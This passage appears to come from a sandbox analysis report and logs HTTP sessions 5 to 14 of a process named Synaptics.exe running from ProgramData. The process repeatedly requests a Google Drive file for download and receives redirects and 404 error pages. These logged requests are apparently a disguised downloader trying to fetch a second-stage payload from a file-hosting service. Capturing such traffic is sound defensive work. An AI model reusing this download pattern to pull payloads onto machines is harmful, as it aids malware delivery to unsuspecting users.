5 | 192.168.2.4 | 49745 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:08 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
2024-12-30 03:59:09 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6TKuRk0hgUk2Tb9kjOxkBIeSTsrnF1u8g4YV721yB-sW5Fz-CpvLZgaHxjghT7i1sgMsch1HM
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UV5JMyfHuzI85Fe0L9FSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=PHLPwFBV3nP3NSbmBNppx94wfdqPQl4Q-izB7Q9f0_bxaxWANYb1QcaTubhKjd2R6xySamhdnl-RYaDARyDu81yP1iK-V-e7E34pqVgPJwxEHcLMQ5b4PH3P0YYqID63fImAuLFJ1XTfSeu5RvIPc-V_WgPJ4D2Xww1UxfxNrV61NdVFmp2YgJg; expires=Tue, 01-Jul-2025 03:59:08 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:09 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 6e 6a 6e 66 5f 77 47 63 76 39 62 4a 6f 70 4f 7a 47 66 79 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bnjnf_wGcv9bJopOzGfyYg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 03:59:09 UTC | 51 | IN
                                                                                                                                                                    Data Ascii: his server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49747 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:08 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
2024-12-30 03:59:09 UTC | 1595 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4ONYrnS6TaNGgqv6UdqQtrihFlHsGikp1VWLQsCFtZphjcPmmJJ0AVXQHzumzqY7pM
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZCQ-PQ88OSpNFbRdm_0DlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ; expires=Tue, 01-Jul-2025 03:59:09 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:09 UTC | 1595 | IN
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wMNkke7NjjytYtge_yYTlw">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 03:59:09 UTC | 57 | IN
                                                                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49750 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-z0uhgEb3L28JVztdGCjl7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49752 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:10 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
2024-12-30 03:59:11 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4KKxO_7hnrUA66jaVCwf6cCnVUhMMQNckVcM4eFLsoq5H9r_A_U427ivZsFvXySlDQ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wtj14MjPh4z9YXZaEgYoNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04; expires=Tue, 01-Jul-2025 03:59:10 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:11 UTC | 1594 | IN
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NVbOmSpR8MvV-ywxLesdYg">*{margin:0;padding:0}html,code{font:15px/22px arial
2024-12-30 03:59:11 UTC | 58 | IN
                                                                                                                                                                    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49753 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:10 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:11 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6RS07ST1kpU9kdRSvtDKk6c4oeW0W-6gvf9wushLh9ElqzmmZdWtjNyRS1YWlQZd1r
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:11 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z2trGexnkfgVwHUKatiSEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:11 UTC | 147 | IN
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:11 UTC | 1390 | IN
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="_9-WMty_8iIogjmNzzCS-Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:11 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49754 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:10 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-urlSNW76vfCIoLcSJEcCJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49756 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:10 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:11 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:11 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TZm_q0-sf804UGJoQ_4xFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49760 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:12 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5LtEz12ZHfeFdJ9-yQqYUnnwrOh5Y0vGEnBiTZhJGzPiovz0WHMkvHMpL--7_-CRd1L0riA1A
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dgYqnm3Mz9zkdy_Ewq9Dew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:12 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:12 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="AgQIxFkh4UB4xxrhf61TdQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:12 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49759 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:11 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
2024-12-30 03:59:12 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:12 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hi0Re6hgfk57Lfs9RLvlcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49763 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:11 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
